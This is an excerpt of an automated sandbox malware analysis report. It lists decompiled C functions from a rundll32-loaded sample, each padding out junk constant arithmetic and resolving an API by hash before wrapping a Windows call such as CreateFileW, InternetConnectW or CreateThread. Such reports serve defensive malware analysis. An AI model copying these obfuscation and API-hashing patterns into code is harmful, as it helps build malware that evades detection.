                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ManagerOpen
                                                                                                        • String ID: OMk
                                                                                                        • API String ID: 1889721586-456170103
                                                                                                        • Opcode ID: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
                                                                                                        • Instruction ID: 0cbdef37f92f2299085e48b3d793f2a4cde293b01d7b6432bdfe1457f000f3fc
                                                                                                        • Opcode Fuzzy Hash: d1e283b7febcfdf4bdf6f7a65a9942aadab0ed956acd7b7642cec6b73cd3d803
                                                                                                        • Instruction Fuzzy Hash: 061125B2C0021CBBEB11EFA5D90A8EFBFB4FF44318F108088E91466201D3B95B149F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E04EE199D(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, long _a20, long _a24, long _a28, long _a32, intOrPtr _a36) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t55;
                                                                                                        				void* _t68;
                                                                                                        				signed int _t69;
                                                                                                        				signed int _t70;
                                                                                                        
                                                                                                        				_push(0);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(_a28);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0);
                                                                                                        				E04EF2523(_t55);
                                                                                                        				_v12 = 0xd4f63c;
                                                                                                        				_v12 = _v12 >> 7;
                                                                                                        				_v12 = _v12 << 0xf;
                                                                                                        				_v12 = _v12 + 0xffffff46;
                                                                                                        				_v12 = _v12 ^ 0xd4fb5fe8;
                                                                                                        				_v8 = 0x967d18;
                                                                                                        				_v8 = _v8 + 0xffffef98;
                                                                                                        				_t69 = 0x14;
                                                                                                        				_v8 = _v8 / _t69;
                                                                                                        				_t70 = 0x4a;
                                                                                                        				_v8 = _v8 / _t70;
                                                                                                        				_v8 = _v8 ^ 0x000a0722;
                                                                                                        				_v20 = 0x4653bc;
                                                                                                        				_v20 = _v20 * 0x70;
                                                                                                        				_v20 = _v20 ^ 0x1ec2604c;
                                                                                                        				_v16 = 0x7577a9;
                                                                                                        				_v16 = _v16 * 0x3c;
                                                                                                        				_v16 = _v16 ^ 0x1b87e59a;
                                                                                                        				E04ED2309(0x10a, _t70, _t70, 0xb484d458, _t70, 0x9c9047d0);
                                                                                                        				_t68 = CreateFileW(_a4, _a24, _a28, 0, _a32, _a20, 0); // executed
                                                                                                        				return _t68;
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(?,?,?,00000000,?,?,00000000), ref: 04EE1A79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFile
                                                                                                        • String ID:
                                                                                                        • API String ID: 823142352-0
                                                                                                        • Opcode ID: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
                                                                                                        • Instruction ID: 16681f1da8ce28d48f5fdf523cae9f8af1c5411dd50a2be847d6b1110bc89695
                                                                                                        • Opcode Fuzzy Hash: 8a2d25935346c61c613306e80470cb2899605f47af9ce82126dccb95390cfdca
                                                                                                        • Instruction Fuzzy Hash: 6921E27280021DBBDF05DF95DC098DEBFB6EF49354F108188FA14662A0D3B69A61AF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E04EF30FB(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, void* _a24, intOrPtr _a32, intOrPtr _a36, signed int _a40, intOrPtr _a48) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				void* _t57;
                                                                                                        				signed int _t58;
                                                                                                        				short _t63;
                                                                                                        
                                                                                                        				_t63 = _a40;
                                                                                                        				_push(_a48);
                                                                                                        				_push(0);
                                                                                                        				_push(_t63 & 0x0000ffff);
                                                                                                        				_push(_a36);
                                                                                                        				_push(_a32);
                                                                                                        				_push(0);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				E04EF2523(_t63 & 0x0000ffff);
                                                                                                        				_a40 = 0x441dde;
                                                                                                        				_a40 = _a40 | 0xef6c71fd;
                                                                                                        				_a40 = _a40 + 0xffff46ca;
                                                                                                        				_a40 = _a40 ^ 0xef65f1b7;
                                                                                                        				_v16 = 0x4e992b;
                                                                                                        				_v16 = _v16 << 0xe;
                                                                                                        				_v16 = _v16 ^ 0xa64ff1a5;
                                                                                                        				_v12 = 0xdc7938;
                                                                                                        				_t58 = 0x71;
                                                                                                        				_v12 = _v12 / _t58;
                                                                                                        				_v12 = _v12 << 5;
                                                                                                        				_v12 = _v12 ^ 0x00369a6d;
                                                                                                        				_v8 = 0xc2c26;
                                                                                                        				_v8 = _v8 << 7;
                                                                                                        				_v8 = _v8 << 3;
                                                                                                        				_v8 = _v8 ^ 0x30b97202;
                                                                                                        				E04ED2309(0x185, _t58, _t58, 0x3cfe7f69, _t58, 0xc0cf1a4);
                                                                                                        				_t57 = InternetConnectW(_a24, _a4, _t63, 0, 0, _a16, 0, 0); // executed
                                                                                                        				return _t57;
                                                                                                        			}









                                                                                                        APIs
                                                                                                        • InternetConnectW.WININET(?,00369A6D,?,00000000,00000000,?,00000000,00000000), ref: 04EF31CA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ConnectInternet
                                                                                                        • String ID:
                                                                                                        • API String ID: 3050416762-0
                                                                                                        • Opcode ID: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
                                                                                                        • Instruction ID: e919e9d724556c816037478e0ae03beb10b6f5c2c8e145a9fe823fd83cba3ea5
                                                                                                        • Opcode Fuzzy Hash: a94079c84f44fd79cf2d8e21410448fccbf556cf6765277f06ac4260a9b0b9f5
                                                                                                        • Instruction Fuzzy Hash: 09214A76900108BBDF01CFA6CC49CDFBFB9EB89704F008189FA1466220C3759A20DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 55%
                                                                                                        			E04EE38CA(void* __ecx, intOrPtr _a8, _Unknown_base(*)()* _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, intOrPtr _a40) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t44;
                                                                                                        				void* _t54;
                                                                                                        				signed int _t56;
                                                                                                        
                                                                                                        				_push(_a40);
                                                                                                        				_push(0);
                                                                                                        				_push(_a32);
                                                                                                        				_push(0);
                                                                                                        				_push(_a24);
                                                                                                        				_push(_a20);
                                                                                                        				_push(_a16);
                                                                                                        				_push(_a12);
                                                                                                        				_push(_a8);
                                                                                                        				_push(0);
                                                                                                        				_push(0);
                                                                                                        				E04EF2523(_t44);
                                                                                                        				_v8 = 0x81d8e3;
                                                                                                        				_v8 = _v8 | 0x29cc6377;
                                                                                                        				_t56 = 0x4e;
                                                                                                        				_v8 = _v8 / _t56;
                                                                                                        				_v8 = _v8 + 0xffff28cb;
                                                                                                        				_v8 = _v8 ^ 0x008a8115;
                                                                                                        				_v20 = 0x37a592;
                                                                                                        				_v20 = _v20 | 0x4431b854;
                                                                                                        				_v20 = _v20 ^ 0x44318d0b;
                                                                                                        				_v16 = 0x83d7ad;
                                                                                                        				_v16 = _v16 | 0x0c5d9c08;
                                                                                                        				_v16 = _v16 ^ 0x0cde7e94;
                                                                                                        				_v12 = 0xac61ec;
                                                                                                        				_v12 = _v12 + 0xffff443d;
                                                                                                        				_v12 = _v12 * 0x13;
                                                                                                        				_v12 = _v12 ^ 0x0cbd13a0;
                                                                                                        				E04ED2309(0x347, _t56, _t56, 0x49f4d21, _t56, 0x9c9047d0);
                                                                                                        				_t54 = CreateThread(0, 0, _a12, _a16, 0, 0); // executed
                                                                                                        				return _t54;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,44318D0B,?,00000000,00000000), ref: 04EE3994
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        • Opcode ID: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
                                                                                                        • Instruction ID: 6cad7958f6ce1f459addf2d10f36cdb3c73faba4698928c6f47ef78aff27cc8c
                                                                                                        • Opcode Fuzzy Hash: 4ee66b657200ea8511f1b49f91465a58aa226465ce330f2d495d8e9b8aa70771
                                                                                                        • Instruction Fuzzy Hash: 3621E271801219BBCF15DFE9DD4A8DFBFB9FF09214F108188E918A6160D3B19A259FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 78%
                                                                                                        			E04ED2985(long __ecx, long __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				unsigned int _v20;
                                                                                                        				void* _t43;
                                                                                                        				void* _t53;
                                                                                                        				signed int _t55;
                                                                                                        				long _t60;
                                                                                                        				long _t61;
                                                                                                        
                                                                                                        				_push(_a12);
                                                                                                        				_t60 = __edx;
                                                                                                        				_t61 = __ecx;
                                                                                                        				_push(_a8);
                                                                                                        				_push(_a4);
                                                                                                        				_push(__edx);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t43);
                                                                                                        				_v20 = 0x610f25;
                                                                                                        				_v20 = _v20 ^ 0x98bdb346;
                                                                                                        				_v20 = _v20 >> 3;
                                                                                                        				_v20 = _v20 ^ 0x13199c72;
                                                                                                        				_v16 = 0x24641b;
                                                                                                        				_t55 = 0x72;
                                                                                                        				_v16 = _v16 * 0x35;
                                                                                                        				_v16 = _v16 ^ 0xfebd96de;
                                                                                                        				_v16 = _v16 ^ 0xf931a9e3;
                                                                                                        				_v12 = 0x6331a9;
                                                                                                        				_v12 = _v12 >> 0xb;
                                                                                                        				_v12 = _v12 / _t55;
                                                                                                        				_v12 = _v12 ^ 0x0006f398;
                                                                                                        				_v8 = 0x8145a8;
                                                                                                        				_v8 = _v8 >> 0xa;
                                                                                                        				_v8 = _v8 << 0xd;
                                                                                                        				_v8 = _v8 + 0x8268;
                                                                                                        				_v8 = _v8 ^ 0x0405b518;
                                                                                                        				E04ED2309(_t55 + 0x5d, _t55, _t55, 0x9d19c04e, _t55, 0x9c9047d0);
                                                                                                        				_t53 = RtlAllocateHeap(_a8, _t60, _t61); // executed
                                                                                                        				return _t53;
                                                                                                        			}













                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(F931A9E3,01AD2A76,65B9EDAF,?,?,?,?,?,?,?,?,00000000,229292B5), ref: 04ED2A3E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
                                                                                                        • Instruction ID: c7b4aab3232ac6a4c85d8f6e716afb64ec441e75b33e7bcacd2ccd3671348fd1
                                                                                                        • Opcode Fuzzy Hash: 138a33bbf657fc90b6a1f11ed01e494c992cf007267dd6aff1ee16601a01d635
                                                                                                        • Instruction Fuzzy Hash: D1213372D00209BBDF18DFA9D84A8DEBFB5FB41714F108098E825A6210E3B5AB55DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04EE77B6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        • Opcode ID: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
                                                                                                        • Instruction ID: ea6b2f8e3e791ca0a4a220a3a16ab935c6f250eaa40b2ca9ba6c30b4a355c581
                                                                                                        • Opcode Fuzzy Hash: 793664888eb73d009d9e5b6ba31e7172053ff3348b2e2b85015c814eee7fae41
                                                                                                        • Instruction Fuzzy Hash: FF1134B2D00209BBDB08DFA4C94A9AEBBB4FF44304F108189E914AB250E3B19B108F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E04EEA566(void* __ecx, void* __edx, void* _a4) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				void* _t31;
                                                                                                        				int _t39;
                                                                                                        
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t31);
                                                                                                        				_v20 = 0xa80c31;
                                                                                                        				_v20 = _v20 * 0x6c;
                                                                                                        				_v20 = _v20 ^ 0x46e6f799;
                                                                                                        				_v16 = 0x35d7e6;
                                                                                                        				_v16 = _v16 << 0xd;
                                                                                                        				_v16 = _v16 ^ 0xbafefac0;
                                                                                                        				_v12 = 0x55f9ae;
                                                                                                        				_v12 = _v12 + 0xffffbfa6;
                                                                                                        				_v12 = _v12 | 0xf8d2795e;
                                                                                                        				_v12 = _v12 ^ 0xf8daa7f9;
                                                                                                        				_v8 = 0xe46cfe;
                                                                                                        				_v8 = _v8 ^ 0xeb94df75;
                                                                                                        				_v8 = _v8 | 0xf69b0666;
                                                                                                        				_v8 = _v8 ^ 0xfffa92dc;
                                                                                                        				E04ED2309(0x148, __ecx, __ecx, 0x2237d547, __ecx, 0x9c9047d0);
                                                                                                        				_t39 = FindCloseChangeNotification(_a4); // executed
                                                                                                        				return _t39;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        • FindCloseChangeNotification.KERNEL32(F8DAA7F9), ref: 04EEA601
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                        • String ID:
                                                                                                        • API String ID: 2591292051-0
                                                                                                        • Opcode ID: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
                                                                                                        • Instruction ID: 7bfd490b4f5f2ef6cb2bb7ac3d82527edfdde19325e83e07aa1c82cf6493d64d
                                                                                                        • Opcode Fuzzy Hash: 2512bc8cf98a9556459c8d1695ff192ee3e01f460f93b2f36ca59e351fe401b9
                                                                                                        • Instruction Fuzzy Hash: 0911F7B5C1030DFBDB18DFE8D8469AEBBB4EF44304F108598A855A6260D3756B158F91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E04EE17CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				signed int _v20;
                                                                                                        				signed int _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				void* _t44;
                                                                                                        				int _t55;
                                                                                                        				signed int _t57;
                                                                                                        				WCHAR* _t62;
                                                                                                        
                                                                                                        				_push(_a8);
                                                                                                        				_t62 = __ecx;
                                                                                                        				_push(_a4);
                                                                                                        				_push(__ecx);
                                                                                                        				E04EF2523(_t44);
                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                        				_v32 = 0x2c5dd9;
                                                                                                        				_v28 = 0x29a411;
                                                                                                        				_v16 = 0xb6013c;
                                                                                                        				_v16 = _v16 >> 2;
                                                                                                        				_v16 = _v16 << 5;
                                                                                                        				_v16 = _v16 ^ 0x05bceb0d;
                                                                                                        				_v12 = 0xa7496a;
                                                                                                        				_t57 = 7;
                                                                                                        				_v12 = _v12 * 0x55;
                                                                                                        				_v12 = _v12 | 0x1a205192;
                                                                                                        				_v12 = _v12 ^ 0x3fab9f8f;
                                                                                                        				_v8 = 0xf5055a;
                                                                                                        				_v8 = _v8 / _t57;
                                                                                                        				_v8 = _v8 + 0xa16;
                                                                                                        				_v8 = _v8 * 0x7e;
                                                                                                        				_v8 = _v8 ^ 0x1132ba81;
                                                                                                        				_v20 = 0xaea409;
                                                                                                        				_v20 = _v20 << 6;
                                                                                                        				_v20 = _v20 ^ 0x2ba3ef66;
                                                                                                        				E04ED2309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
                                                                                                        				_t55 = lstrcmpiW(_t62, _a8); // executed
                                                                                                        				return _t55;
                                                                                                        			}















                                                                                                        APIs
                                                                                                        • lstrcmpiW.KERNEL32(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 04EE188D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpi
                                                                                                        • String ID:
                                                                                                        • API String ID: 1586166983-0
                                                                                                        • Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction ID: f5300d26bccbc976f66e5f4b28cefeebba4601cd87e714554869e8bdf4187156
                                                                                                        • Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
                                                                                                        • Instruction Fuzzy Hash: B82124B5D0020DFFDB08DFA4C94A9EEBBB4EB44304F208189E525B7240E3B56B049FA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions